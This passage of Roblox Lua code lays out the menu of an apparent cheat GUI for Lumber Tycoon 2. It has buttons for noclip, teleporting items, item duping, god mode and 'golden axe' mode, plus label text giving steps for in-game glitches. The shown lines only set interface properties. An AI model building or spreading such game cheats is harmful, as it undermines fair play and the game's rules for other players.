  681. CopyTool.TextColor3 = Color3.new(1, 1, 1)
  682. CopyTool.BorderColor3 = Color3.new(0, 1, 0)
  683. CopyTool.Position = UDim2.new(0, 97, 0, 290)
  684. CopyTool.Size = UDim2.new(0, 64, 0, 20)
  685. CopyTool.Font = Enum.Font.Fantasy
  686. CopyTool.FontSize = Enum.FontSize.Size18
  687. CopyTool.BackgroundTransparency = 0
  688. CopyTool.Text = "Copy"
  689. CopyTool.ZIndex = 8
  690. CopyTool.TextSize = 17
  691.  
  692. DeleteTool.Name = "DeleteTool"
  693. DeleteTool.Parent = LT2GUI2Frame
  694. DeleteTool.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  695. DeleteTool.TextColor3 = Color3.new(1, 1, 1)
  696. DeleteTool.BorderColor3 = Color3.new(0, 1, 0)
  697. DeleteTool.Position = UDim2.new(0, 169, 0, 290)
  698. DeleteTool.Size = UDim2.new(0, 64, 0, 20)
  699. DeleteTool.Font = Enum.Font.Fantasy
  700. DeleteTool.FontSize = Enum.FontSize.Size18
  701. DeleteTool.BackgroundTransparency = 0
  702. DeleteTool.Text = "Delete"
  703. DeleteTool.ZIndex = 8
  704. DeleteTool.TextSize = 17
  705.  
  706. MoveTool.Name = "MoveTool"
  707. MoveTool.Parent = LT2GUI2Frame
  708. MoveTool.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  709. MoveTool.TextColor3 = Color3.new(1, 1, 1)
  710. MoveTool.BorderColor3 = Color3.new(0, 1, 0)
  711. MoveTool.Position = UDim2.new(0, 241, 0, 290)
  712. MoveTool.Size = UDim2.new(0, 64, 0, 20)
  713. MoveTool.Font = Enum.Font.Fantasy
  714. MoveTool.FontSize = Enum.FontSize.Size18
  715. MoveTool.BackgroundTransparency = 0
  716. MoveTool.Text = "Move"
  717. MoveTool.ZIndex = 8
  718. MoveTool.TextSize = 17
  719.  
  720. TPTool.Name = "TPTool"
  721. TPTool.Parent = MainFrame
  722. TPTool.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  723. TPTool.BorderColor3 = Color3.new(0, 1, 0)
  724. TPTool.Position = UDim2.new(0, 145, 0, 10)
  725. TPTool.Size = UDim2.new(0, 60, 0, 20)
  726. TPTool.Font = Enum.Font.Fantasy
  727. TPTool.FontSize = Enum.FontSize.Size18
  728. TPTool.Text = "Tp Tool"
  729. TPTool.TextColor3 = Color3.new(1, 1, 1)
  730. TPTool.TextSize = 17
  731.  
  732. NoClip.Name = "NoClip"
  733. NoClip.Parent = MainFrame
  734. NoClip.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  735. NoClip.BorderColor3 = Color3.new(0, 1, 0)
  736. NoClip.Position = UDim2.new(0, 215, 0, 10)
  737. NoClip.Size = UDim2.new(0, 110, 0, 20)
  738. NoClip.Font = Enum.Font.Fantasy
  739. NoClip.FontSize = Enum.FontSize.Size18
  740. NoClip.Text = "Enable NoClip"
  741. NoClip.TextColor3 = Color3.new(1, 1, 1)
  742. NoClip.TextSize = 17
  743.  
  744. Depart.Name = "Depart"
  745. Depart.Parent = MenuLeftFrame
  746. Depart.BackgroundColor3 = Color3.new(0, 0, 0)
  747. Depart.BackgroundTransparency = 1
  748. Depart.Position = UDim2.new(0, 5, 0, 0)
  749. Depart.Size = UDim2.new(0, 135, 0, 20)
  750. Depart.Font = Enum.Font.Fantasy
  751. Depart.FontSize = Enum.FontSize.Size18
  752. Depart.Text = "Ferry Departs: 0"
  753. Depart.TextColor3 = Color3.new(1, 1, 1)
  754. Depart.TextSize = 17
  755.  
  756. Waypoints.Name = "Waypoints"
  757. Waypoints.Parent = MenuLeftFrame
  758. Waypoints.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  759. Waypoints.TextColor3 = Color3.new(1, 1, 1)
  760. Waypoints.BorderColor3 = Color3.new(0, 1, 0)
  761. Waypoints.Position = UDim2.new(0, 5, 0, 30)
  762. Waypoints.Size = UDim2.new(0, 135, 0, 20)
  763. Waypoints.Font = Enum.Font.Fantasy
  764. Waypoints.FontSize = Enum.FontSize.Size18
  765. Waypoints.Text = "Waypoints"
  766. Waypoints.TextSize = 17
  767.  
  768. TPWood.Name = "TPWood"
  769. TPWood.Parent = MenuLeftFrame
  770. TPWood.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  771. TPWood.BorderColor3 = Color3.new(0, 1, 0)
  772. TPWood.Position = UDim2.new(0, 5, 0, 60)
  773. TPWood.Size = UDim2.new(0, 135, 0, 20)
  774. TPWood.Font = Enum.Font.Fantasy
  775. TPWood.FontSize = Enum.FontSize.Size18
  776. TPWood.Text = "TP Wood to You"
  777. TPWood.TextColor3 = Color3.new(1, 1, 1)
  778. TPWood.TextSize = 17
  779.  
  780. TPPlanks.Name = "TPPlanks"
  781. TPPlanks.Parent = MenuLeftFrame
  782. TPPlanks.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  783. TPPlanks.BorderColor3 = Color3.new(0, 1, 0)
  784. TPPlanks.Position = UDim2.new(0, 5, 0, 90)
  785. TPPlanks.Size = UDim2.new(0, 135, 0, 20)
  786. TPPlanks.Font = Enum.Font.Fantasy
  787. TPPlanks.FontSize = Enum.FontSize.Size18
  788. TPPlanks.Text = "TP Planks to You"
  789. TPPlanks.TextColor3 = Color3.new(1, 1, 1)
  790. TPPlanks.TextSize = 17
  791.  
  792. PlankFrame.Name = "PlankFrame"
  793. PlankFrame.Parent = MenuFrame
  794. PlankFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  795. PlankFrame.BackgroundTransparency = 0
  796. PlankFrame.BorderColor3 = Color3.new(0, 1, 0)
  797. PlankFrame.Position = UDim2.new(0, 0, 0, 34)
  798. PlankFrame.Size = UDim2.new(0, 170, 0, 256)
  799. PlankFrame.Visible = false
  800.  
  801. ProcessedWoodList.Name = "ProcessedWoodList"
  802. ProcessedWoodList.Parent = PlankFrame
  803. ProcessedWoodList.BackgroundColor3 = Color3.new(0, 0, 0)
  804. ProcessedWoodList.BackgroundTransparency = 1
  805. ProcessedWoodList.BorderColor3 = Color3.new(0, 1, 0)
  806. ProcessedWoodList.Position = UDim2.new(0, 0, 0, 1)
  807. ProcessedWoodList.Size = UDim2.new(0, 170, 0, 256)
  808.  
  809. TpAllPlanks.Name = "TpAllPlanks"
  810. TpAllPlanks.Parent = PlankFrame
  811. TpAllPlanks.BackgroundColor3 = Color3.new(0.15, 0.15, 0.15)
  812. TpAllPlanks.BorderColor3 = Color3.new(0, 1, 0)
  813. TpAllPlanks.Position = UDim2.new(0, 0, 0, -34)
  814. TpAllPlanks.Size = UDim2.new(0, 170, 0, 30)
  815. TpAllPlanks.Font = Enum.Font.Fantasy
  816. TpAllPlanks.FontSize = Enum.FontSize.Size18
  817. TpAllPlanks.Text = "TP ALL PLANKS"
  818. TpAllPlanks.TextColor3 = Color3.new(1, 1, 1)
  819. TpAllPlanks.TextSize = 18
  820.  
  821. TpAllPlanksSpacer.Name = "TpAllPlanksSpacer"
  822. TpAllPlanksSpacer.Parent = PlankFrame
  823. TpAllPlanksSpacer.BackgroundTransparency = 0
  824. TpAllPlanksSpacer.BackgroundColor3 = Color3.new(0, 0, 0)
  825. TpAllPlanksSpacer.BorderColor3 = Color3.new(0, 1, 0)
  826. TpAllPlanksSpacer.Position = UDim2.new(0, 0, 0, -4)
  827. TpAllPlanksSpacer.Size = UDim2.new(0, 170, 0, 4)
  828. TpAllPlanksSpacer.Font = Enum.Font.Fantasy
  829. TpAllPlanksSpacer.Text = ""
  830. TpAllPlanksSpacer.TextColor3 = Color3.new(1, 1, 1)
  831. TpAllPlanksSpacer.TextSize = 17
  832.  
  833. SellWoodPlanks.Name = "SellWoodPlanks"
  834. SellWoodPlanks.Parent = MenuLeftFrame
  835. SellWoodPlanks.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  836. SellWoodPlanks.BorderColor3 = Color3.new(0, 1, 0)
  837. SellWoodPlanks.Position = UDim2.new(0, 5, 0, 120)
  838. SellWoodPlanks.Size = UDim2.new(0, 135, 0, 20)
  839. SellWoodPlanks.Font = Enum.Font.Fantasy
  840. SellWoodPlanks.FontSize = Enum.FontSize.Size18
  841. SellWoodPlanks.Text = "Sell Wood/Planks"
  842. SellWoodPlanks.TextColor3 = Color3.new(1, 1, 1)
  843. SellWoodPlanks.TextSize = 17
  844.  
  845. SellFrame.Name = "SellFrame"
  846. SellFrame.Parent = MenuFrame
  847. SellFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  848. SellFrame.BackgroundTransparency = 0
  849. SellFrame.BorderColor3 = Color3.new(0, 1, 0)
  850. SellFrame.Size = UDim2.new(0, 170, 0, 290)
  851. SellFrame.Visible = false
  852.  
  853. SellWood.Name = "SellWood"
  854. SellWood.Parent = SellFrame
  855. SellWood.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  856. SellWood.BorderColor3 = Color3.new(0, 1, 0)
  857. SellWood.Position = UDim2.new(0, 30, 0, 10)
  858. SellWood.Size = UDim2.new(0, 110, 0, 20)
  859. SellWood.Font = Enum.Font.Fantasy
  860. SellWood.FontSize = Enum.FontSize.Size18
  861. SellWood.Text = "Sell Cut Wood"
  862. SellWood.TextColor3 = Color3.new(1, 1, 1)
  863. SellWood.TextSize = 17
  864.  
  865. SellWoodTxt1.Name = "SellWoodTxt1"
  866. SellWoodTxt1.Parent = SellFrame
  867. SellWoodTxt1.BackgroundColor3 = Color3.new(0, 0, 0)
  868. SellWoodTxt1.BackgroundTransparency = 1
  869. SellWoodTxt1.BorderColor3 = Color3.new(0, 0, 0)
  870. SellWoodTxt1.Position = UDim2.new(0, 5, 0, 35)
  871. SellWoodTxt1.Size = UDim2.new(0, 160, 0, 100)
  872. SellWoodTxt1.Font = Enum.Font.Fantasy
  873. SellWoodTxt1.FontSize = Enum.FontSize.Size18
  874. SellWoodTxt1.Text = "Click this after you finish chopping trees to send the wood to the Wood Drop Off and sell it automatically. If it gets stuck click Sell again.\n\n"
  875. SellWoodTxt1.TextColor3 = Color3.new(0, 1, 0)
  876. SellWoodTxt1.TextSize = 14
  877. SellWoodTxt1.TextWrapped = true
  878. SellWoodTxt1.TextYAlignment = Enum.TextYAlignment.Top
  879.  
  880. SellPlanks.Name = "SellPlanks"
  881. SellPlanks.Parent = SellFrame
  882. SellPlanks.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  883. SellPlanks.BorderColor3 = Color3.new(0, 1, 0)
  884. SellPlanks.Position = UDim2.new(0, 6, 0, 135)
  885. SellPlanks.Size = UDim2.new(0, 158, 0, 20)
  886. SellPlanks.Font = Enum.Font.Fantasy
  887. SellPlanks.FontSize = Enum.FontSize.Size18
  888. SellPlanks.Text = "Sell Processed Planks"
  889. SellPlanks.TextColor3 = Color3.new(1, 1, 1)
  890. SellPlanks.TextSize = 17
  891.  
  892. SellPlanksTxt1.Name = "SellPlanksTxt1"
  893. SellPlanksTxt1.Parent = SellFrame
  894. SellPlanksTxt1.BackgroundColor3 = Color3.new(0, 0, 0)
  895. SellPlanksTxt1.BackgroundTransparency = 1
  896. SellPlanksTxt1.BorderColor3 = Color3.new(0, 0, 0)
  897. SellPlanksTxt1.Position = UDim2.new(0, 5, 0, 160)
  898. SellPlanksTxt1.Size = UDim2.new(0, 160, 0, 120)
  899. SellPlanksTxt1.Font = Enum.Font.Fantasy
  900. SellPlanksTxt1.FontSize = Enum.FontSize.Size18
  901. SellPlanksTxt1.Text = "Click this to send ALL processed planks on your plot to the Wood Drop Off and sell it automatically. If it gets stuck click Sell again. WARNING: Do Not click this unless you want ALL your planks to be sold."
  902. SellPlanksTxt1.TextColor3 = Color3.new(0, 1, 0)
  903. SellPlanksTxt1.TextSize = 14
  904. SellPlanksTxt1.TextWrapped = true
  905. SellPlanksTxt1.TextYAlignment = Enum.TextYAlignment.Top
  906.  
  907. BringTree.Name = "BringTree"
  908. BringTree.Parent = MenuLeftFrame
  909. BringTree.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  910. BringTree.BorderColor3 = Color3.new(0, 1, 0)
  911. BringTree.Position = UDim2.new(0, 5, 0, 150)
  912. BringTree.Size = UDim2.new(0, 135, 0, 20)
  913. BringTree.Font = Enum.Font.Fantasy
  914. BringTree.FontSize = Enum.FontSize.Size18
  915. BringTree.Text = "Bring A Tree"
  916. BringTree.TextColor3 = Color3.new(1, 1, 1)
  917. BringTree.TextSize = 17
  918.  
  919. PlayerTp.Name = "PlayerTp"
  920. PlayerTp.Parent = MenuLeftFrame
  921. PlayerTp.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  922. PlayerTp.TextColor3 = Color3.new(1, 1, 1)
  923. PlayerTp.BorderColor3 = Color3.new(0, 1, 0)
  924. PlayerTp.Position = UDim2.new(0, 5, 0, 180)
  925. PlayerTp.Size = UDim2.new(0, 135, 0, 20)
  926. PlayerTp.Font = Enum.Font.Fantasy
  927. PlayerTp.FontSize = Enum.FontSize.Size18
  928. PlayerTp.Text = "Tp to Players"
  929. PlayerTp.TextSize = 17
  930.  
  931. Duper.Name = "Duper"
  932. Duper.Parent = MenuLeftFrame
  933. Duper.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  934. Duper.TextColor3 = Color3.new(1, 1, 1)
  935. Duper.BorderColor3 = Color3.new(0, 1, 0)
  936. Duper.Position = UDim2.new(0, 5, 0, 210)
  937. Duper.Size = UDim2.new(0, 135, 0, 20)
  938. Duper.Font = Enum.Font.Fantasy
  939. Duper.FontSize = Enum.FontSize.Size18
  940. Duper.Text = "Item Duping"
  941. Duper.TextSize = 17
  942.  
  943. Greywood.Name = "Greywood"
  944. Greywood.Parent = MenuLeftFrame
  945. Greywood.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  946. Greywood.TextColor3 = Color3.new(1, 1, 1)
  947. Greywood.BorderColor3 = Color3.new(0, 1, 0)
  948. Greywood.Position = UDim2.new(0, 5, 0, 240)
  949. Greywood.Size = UDim2.new(0, 135, 0, 20)
  950. Greywood.Font = Enum.Font.Fantasy
  951. Greywood.FontSize = Enum.FontSize.Size18
  952. Greywood.Text = "Grey Structures"
  953. Greywood.TextSize = 17
  954.  
  955. GreywoodFrame.Name = "GreywoodFrame"
  956. GreywoodFrame.Parent = MenuFrame
  957. GreywoodFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  958. GreywoodFrame.BackgroundTransparency = 0
  959. GreywoodFrame.BorderColor3 = Color3.new(0, 1, 0)
  960. GreywoodFrame.Size = UDim2.new(0, 170, 0, 290)
  961. GreywoodFrame.Visible = false
  962.  
  963. GreywoodHeader.Name = "GreywoodHeader"
  964. GreywoodHeader.Parent = GreywoodFrame
  965. GreywoodHeader.BackgroundColor3 = Color3.new(1, 1, 1)
  966. GreywoodHeader.BackgroundTransparency = 0.15
  967. GreywoodHeader.BorderColor3 = Color3.new(0, 1, 0)
  968. GreywoodHeader.Size = UDim2.new(0, 170, 0, 35)
  969. GreywoodHeader.Font = Enum.Font.Fantasy
  970. GreywoodHeader.FontSize = Enum.FontSize.Size18
  971. GreywoodHeader.Text = "TURN EMPTY BLUEPRINT TO GREYWOOD"
  972. GreywoodHeader.TextColor3 = Color3.new(0, 0, 0)
  973. GreywoodHeader.TextScaled = true
  974. GreywoodHeader.TextSize = 17
  975. GreywoodHeader.TextWrapped = true
  976.  
  977. GreywoodInfo.Name = "GreywoodInfo"
  978. GreywoodInfo.Parent = GreywoodFrame
  979. GreywoodInfo.BackgroundColor3 = Color3.new(0, 0, 0)
  980. GreywoodInfo.BackgroundTransparency = 1
  981. GreywoodInfo.Position = UDim2.new(0, 5, 0, 40)
  982. GreywoodInfo.Size = UDim2.new(0, 160, 0, 250)
  983. GreywoodInfo.Font = Enum.Font.Fantasy
  984. GreywoodInfo.FontSize = Enum.FontSize.Size14
  985. GreywoodInfo.Text = "1. Place Blueprints down.\n2. Click on 'Start' below.\n3. Press 'e' on blueprint.\n4. Click on Move.\n5. Press 'b' to cancel the move.\n6. It should now be filled with GreyWood\n\nNOTE: Some blueprints will not fill with Grey. Smooth Wall blueprints seem to work best but you can try whatever you want."
  986. GreywoodInfo.TextColor3 = Color3.new(0, 1, 0)
  987. GreywoodInfo.TextSize = 14
  988. GreywoodInfo.TextYAlignment = Enum.TextYAlignment.Top
  989. GreywoodInfo.TextWrapped = true
  990.  
  991. GreywoodStart.Name = "GreywoodStart"
  992. GreywoodStart.Parent = GreywoodFrame
  993. GreywoodStart.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  994. GreywoodStart.BorderColor3 = Color3.new(0, 1, 0)
  995. GreywoodStart.Position = UDim2.new(0, 25, 0, 255)
  996. GreywoodStart.Size = UDim2.new(0, 120, 0, 25)
  997. GreywoodStart.Font = Enum.Font.Fantasy
  998. GreywoodStart.FontSize = Enum.FontSize.Size18
  999. GreywoodStart.Text = "Start"
  1000. GreywoodStart.TextColor3 = Color3.new(1, 1, 1)
  1001. GreywoodStart.TextSize = 17
  1002.  
  1003. WaterCollide.Name = "WaterCollide"
  1004. WaterCollide.Parent = MenuLeftFrame
  1005. WaterCollide.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1006. WaterCollide.BorderColor3 = Color3.new(0, 1, 0)
  1007. WaterCollide.Position = UDim2.new(0, 5, 0, 270)
  1008. WaterCollide.Size = UDim2.new(0, 135, 0, 20)
  1009. WaterCollide.Font = Enum.Font.Fantasy
  1010. WaterCollide.FontSize = Enum.FontSize.Size18
  1011. WaterCollide.Text = "Walk on Water"
  1012. WaterCollide.TextColor3 = Color3.new(1, 1, 1)
  1013. WaterCollide.TextSize = 17
  1014.  
  1015. GodMode.Name = "GodMode"
  1016. GodMode.Parent = MenuLeftFrame
  1017. GodMode.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1018. GodMode.TextColor3 = Color3.new(1, 1, 1)
  1019. GodMode.BorderColor3 = Color3.new(0, 1, 0)
  1020. GodMode.Position = UDim2.new(0, 5, 0, 300)
  1021. GodMode.Size = UDim2.new(0, 55, 0, 20)
  1022. GodMode.Font = Enum.Font.Fantasy
  1023. GodMode.FontSize = Enum.FontSize.Size18
  1024. GodMode.Text = "God"
  1025. GodMode.TextScaled = true
  1026. GodMode.TextSize = 17
  1027.  
  1028. GoldAxe.Name = "GoldAxe"
  1029. GoldAxe.Parent = MenuLeftFrame
  1030. GoldAxe.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1031. GoldAxe.TextColor3 = Color3.new(1, 1, 1)
  1032. GoldAxe.BorderColor3 = Color3.new(0, 1, 0)
  1033. GoldAxe.Position = UDim2.new(0, 70, 0, 300)
  1034. GoldAxe.Size = UDim2.new(0, 70, 0, 20)
  1035. GoldAxe.Font = Enum.Font.Fantasy
  1036. GoldAxe.FontSize = Enum.FontSize.Size18
  1037. GoldAxe.Text = "Gold Axe"
  1038. GoldAxe.TextWrapped = true
  1039. GoldAxe.TextSize = 17
  1040.  
  1041. GoldAxeFrame.Name = "GoldAxeFrame"
  1042. GoldAxeFrame.Parent = MenuFrame
  1043. GoldAxeFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  1044. GoldAxeFrame.BackgroundTransparency = 0
  1045. GoldAxeFrame.BorderColor3 = Color3.new(0, 1, 0)
  1046. GoldAxeFrame.Size = UDim2.new(0, 170, 0, 290)
  1047. GoldAxeFrame.Visible = false
  1048.  
  1049. GoldAxeHeader.Name = "GoldAxeHeader"
  1050. GoldAxeHeader.Parent = GoldAxeFrame
  1051. GoldAxeHeader.BackgroundColor3 = Color3.new(1, 1, 1)
  1052. GoldAxeHeader.BackgroundTransparency = 0.15
  1053. GoldAxeHeader.BorderColor3 = Color3.new(0, 1, 0)
  1054. GoldAxeHeader.Size = UDim2.new(0, 170, 0, 35)
  1055. GoldAxeHeader.Font = Enum.Font.Fantasy
  1056. GoldAxeHeader.FontSize = Enum.FontSize.Size18
  1057. GoldAxeHeader.Text = "CHOP WOOD WITH GOLDEN AXE POWER"
  1058. GoldAxeHeader.TextColor3 = Color3.new(0, 0, 0)
  1059. GoldAxeHeader.TextScaled = true
  1060. GoldAxeHeader.TextSize = 17
  1061. GoldAxeHeader.TextWrapped = true
  1062.  
  1063. GoldAxeInfo.Name = "GoldAxeInfo"
  1064. GoldAxeInfo.Parent = GoldAxeFrame
  1065. GoldAxeInfo.BackgroundColor3 = Color3.new(0, 0, 0)
  1066. GoldAxeInfo.BackgroundTransparency = 1
  1067. GoldAxeInfo.Position = UDim2.new(0, 5, 0, 40)
  1068. GoldAxeInfo.Size = UDim2.new(0, 160, 0, 210)
  1069. GoldAxeInfo.Font = Enum.Font.Fantasy
  1070. GoldAxeInfo.FontSize = Enum.FontSize.Size14
  1071. GoldAxeInfo.Text = "1. Buy a Basic Hatchet if you don't have one\n\n2. Click the start button to enable Golden Axe mode\n\n3. Take out the Basic Hatchet and hold down the left mouse button on a tree to cut through it.\n\nONLY use a Basic Hatchet with Golden Axe mode enabled or you will drop the axe and die."
  1072. GoldAxeInfo.TextColor3 = Color3.new(0, 1, 0)
  1073. GoldAxeInfo.TextSize = 14
  1074. GoldAxeInfo.TextYAlignment = Enum.TextYAlignment.Top
  1075. GoldAxeInfo.TextWrapped = true
  1076.  
  1077. GoldAxeStart.Name = "GoldAxeStart"
  1078. GoldAxeStart.Parent = GoldAxeFrame
  1079. GoldAxeStart.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1080. GoldAxeStart.BorderColor3 = Color3.new(0, 1, 0)
  1081. GoldAxeStart.Position = UDim2.new(0, 25, 0, 255)
  1082. GoldAxeStart.Size = UDim2.new(0, 120, 0, 25)
  1083. GoldAxeStart.Font = Enum.Font.Fantasy
  1084. GoldAxeStart.FontSize = Enum.FontSize.Size18
  1085. GoldAxeStart.Text = "Start"
  1086. GoldAxeStart.TextColor3 = Color3.new(1, 1, 1)
  1087. GoldAxeStart.TextSize = 17
  1088.  
  1089. WaypointFrame.Name = "WaypointFrame"
  1090. WaypointFrame.Parent = MenuFrame
  1091. WaypointFrame.BackgroundColor3 = Color3.new(0, 0, 0)
  1092. WaypointFrame.BackgroundTransparency = 0
  1093. WaypointFrame.BorderColor3 = Color3.new(0, 1, 0)
  1094. WaypointFrame.Size = UDim2.new(0, 170, 0, 290)
  1095. WaypointFrame.Visible = false
  1096.  
  1097. WaypointList.Name = "WaypointList"
  1098. WaypointList.Parent = WaypointFrame
  1099. WaypointList.BackgroundColor3 = Color3.new(0, 0, 0)
  1100. WaypointList.BackgroundTransparency = 0
  1101. WaypointList.BorderColor3 = Color3.new(0, 1, 0)
  1102. WaypointList.Size = UDim2.new(0, 170, 0, 290)
  1103. WaypointList.CanvasSize = UDim2.new(0, 0, 2.15, 0)
  1104.  
  1105. ShowLocation.Name = "ShowLocation"
  1106. ShowLocation.Parent = WaypointList
  1107. ShowLocation.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1108. ShowLocation.TextColor3 = Color3.new(1, 1, 1)
  1109. ShowLocation.BorderColor3 = Color3.new(0, 1, 0)
  1110. ShowLocation.Position = UDim2.new(0, 5, 0, 5)
  1111. ShowLocation.Size = UDim2.new(0, 147, 0, 40)
  1112. ShowLocation.Font = Enum.Font.Fantasy
  1113. ShowLocation.FontSize = Enum.FontSize.Size14
  1114. ShowLocation.Text = "Show Current Coords\nSet Custom Location"
  1115. ShowLocation.TextWrapped = true
  1116. ShowLocation.TextSize = 15
  1117.  
  1118. CustomTPPoint.Name = "CustomTPPoint"
  1119. CustomTPPoint.Parent = WaypointList
  1120. CustomTPPoint.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1121. CustomTPPoint.TextColor3 = Color3.new(1, 1, 1)
  1122. CustomTPPoint.BorderColor3 = Color3.new(0, 1, 0)
  1123. CustomTPPoint.Position = UDim2.new(0, 5, 0, 50)
  1124. CustomTPPoint.Size = UDim2.new(0, 147, 0, 20)
  1125. CustomTPPoint.Font = Enum.Font.Fantasy
  1126. CustomTPPoint.FontSize = Enum.FontSize.Size14
  1127. CustomTPPoint.Text = "TP to Custom Location"
  1128. CustomTPPoint.TextWrapped = true
  1129. CustomTPPoint.TextSize = 15
  1130.  
  1131. PlotTp.Name = "PlotTp"
  1132. PlotTp.Parent = WaypointList
  1133. PlotTp.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1134. PlotTp.TextColor3 = Color3.new(1, 1, 1)
  1135. PlotTp.BorderColor3 = Color3.new(0, 1, 0)
  1136. PlotTp.Position = UDim2.new(0, 5, 0, 75)
  1137. PlotTp.Size = UDim2.new(0, 147, 0, 20)
  1138. PlotTp.Font = Enum.Font.Fantasy
  1139. PlotTp.FontSize = Enum.FontSize.Size14
  1140. PlotTp.Text = "Tp to Your Plot"
  1141. PlotTp.TextSize = 16
  1142.  
  1143. SpawnPoint.Name = "SpawnPoint"
  1144. SpawnPoint.Parent = WaypointList
  1145. SpawnPoint.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1146. SpawnPoint.TextColor3 = Color3.new(1, 1, 1)
  1147. SpawnPoint.BorderColor3 = Color3.new(0, 1, 0)
  1148. SpawnPoint.Position = UDim2.new(0, 5, 0, 100)
  1149. SpawnPoint.Size = UDim2.new(0, 147, 0, 20)
  1150. SpawnPoint.Font = Enum.Font.Fantasy
  1151. SpawnPoint.FontSize = Enum.FontSize.Size14
  1152. SpawnPoint.Text = "Spawn Point"
  1153. SpawnPoint.TextSize = 16
  1154.  
  1155. WoodRUs.Name = "WoodRUs"
  1156. WoodRUs.Parent = WaypointList
  1157. WoodRUs.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1158. WoodRUs.TextColor3 = Color3.new(1, 1, 1)
  1159. WoodRUs.BorderColor3 = Color3.new(0, 1, 0)
  1160. WoodRUs.Position = UDim2.new(0, 5, 0, 125)
  1161. WoodRUs.Size = UDim2.new(0, 147, 0, 20)
  1162. WoodRUs.Font = Enum.Font.Fantasy
  1163. WoodRUs.FontSize = Enum.FontSize.Size14
  1164. WoodRUs.Text = "Wood R Us"
  1165. WoodRUs.TextSize = 16
  1166.  
  1167. LinksLogic.Name = "LinksLogic"
  1168. LinksLogic.Parent = WaypointList
  1169. LinksLogic.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1170. LinksLogic.TextColor3 = Color3.new(1, 1, 1)
  1171. LinksLogic.BorderColor3 = Color3.new(0, 1, 0)
  1172. LinksLogic.Position = UDim2.new(0, 5, 0, 150)
  1173. LinksLogic.Size = UDim2.new(0, 147, 0, 20)
  1174. LinksLogic.Font = Enum.Font.Fantasy
  1175. LinksLogic.FontSize = Enum.FontSize.Size14
  1176. LinksLogic.Text = "Link's Logic"
  1177. LinksLogic.TextSize = 16
  1178.  
  1179. BoxedCars.Name = "BoxedCars"
  1180. BoxedCars.Parent = WaypointList
  1181. BoxedCars.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1182. BoxedCars.TextColor3 = Color3.new(1, 1, 1)
  1183. BoxedCars.BorderColor3 = Color3.new(0, 1, 0)
  1184. BoxedCars.Position = UDim2.new(0, 5, 0, 175)
  1185. BoxedCars.Size = UDim2.new(0, 147, 0, 20)
  1186. BoxedCars.Font = Enum.Font.Fantasy
  1187. BoxedCars.FontSize = Enum.FontSize.Size14
  1188. BoxedCars.Text = "Boxed Cars"
  1189. BoxedCars.TextSize = 16
  1190.  
  1191. FancyFurnishings.Name = "FancyFurnishings"
  1192. FancyFurnishings.Parent = WaypointList
  1193. FancyFurnishings.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1194. FancyFurnishings.TextColor3 = Color3.new(1, 1, 1)
  1195. FancyFurnishings.BorderColor3 = Color3.new(0, 1, 0)
  1196. FancyFurnishings.Position = UDim2.new(0, 5, 0, 200)
  1197. FancyFurnishings.Size = UDim2.new(0, 147, 0, 20)
  1198. FancyFurnishings.Font = Enum.Font.Fantasy
  1199. FancyFurnishings.FontSize = Enum.FontSize.Size14
  1200. FancyFurnishings.Text = "Fancy Furnishings"
  1201. FancyFurnishings.TextSize = 16
  1202.  
  1203. LandStore.Name = "LandStore"
  1204. LandStore.Parent = WaypointList
  1205. LandStore.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1206. LandStore.TextColor3 = Color3.new(1, 1, 1)
  1207. LandStore.BorderColor3 = Color3.new(0, 1, 0)
  1208. LandStore.Position = UDim2.new(0, 5, 0, 225)
  1209. LandStore.Size = UDim2.new(0, 147, 0, 20)
  1210. LandStore.Font = Enum.Font.Fantasy
  1211. LandStore.FontSize = Enum.FontSize.Size14
  1212. LandStore.Text = "Land Store"
  1213. LandStore.TextSize = 16
  1214.  
  1215. FineArtsShop.Name = "FineArtsShop"
  1216. FineArtsShop.Parent = WaypointList
  1217. FineArtsShop.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1218. FineArtsShop.TextColor3 = Color3.new(1, 1, 1)
  1219. FineArtsShop.BorderColor3 = Color3.new(0, 1, 0)
  1220. FineArtsShop.Position = UDim2.new(0, 5, 0, 250)
  1221. FineArtsShop.Size = UDim2.new(0, 147, 0, 20)
  1222. FineArtsShop.Font = Enum.Font.Fantasy
  1223. FineArtsShop.FontSize = Enum.FontSize.Size14
  1224. FineArtsShop.Text = "Fine Arts Shop"
  1225. FineArtsShop.TextSize = 16
  1226.  
  1227. BobsShack.Name = "BobsShack"
  1228. BobsShack.Parent = WaypointList
  1229. BobsShack.BackgroundColor3 = Color3.new(0.2, 0.2, 0.2)
  1230. BobsShack.TextColor3 = Color3.new(1, 1, 1)
  1231. BobsShack.BorderColor3 = Color3.new(0, 1, 0)
  1232. BobsShack.Position = UDim2.new(0, 5, 0, 275)
